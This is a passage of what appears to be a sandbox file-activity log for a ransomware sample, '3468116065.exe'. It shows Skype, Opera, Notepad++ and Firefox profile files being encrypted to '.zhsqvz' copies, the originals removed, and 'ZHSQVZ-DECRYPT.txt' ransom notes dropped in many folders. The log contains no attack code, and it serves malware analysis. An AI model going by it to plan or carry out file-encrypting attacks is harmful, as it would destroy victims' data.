2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\logs\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\DataRv\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Local\Temp\pidor.bmp image
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\Opera\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Opera\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml.zhsqvz flc
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml.zhsqvz gpg
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\plugins\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Notepad++\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\SystemExtensionsDev\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\temporary\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.files\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.files\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.files\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.files\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.zhsqvz binary
2180 3468116065.exe C:\Users\admin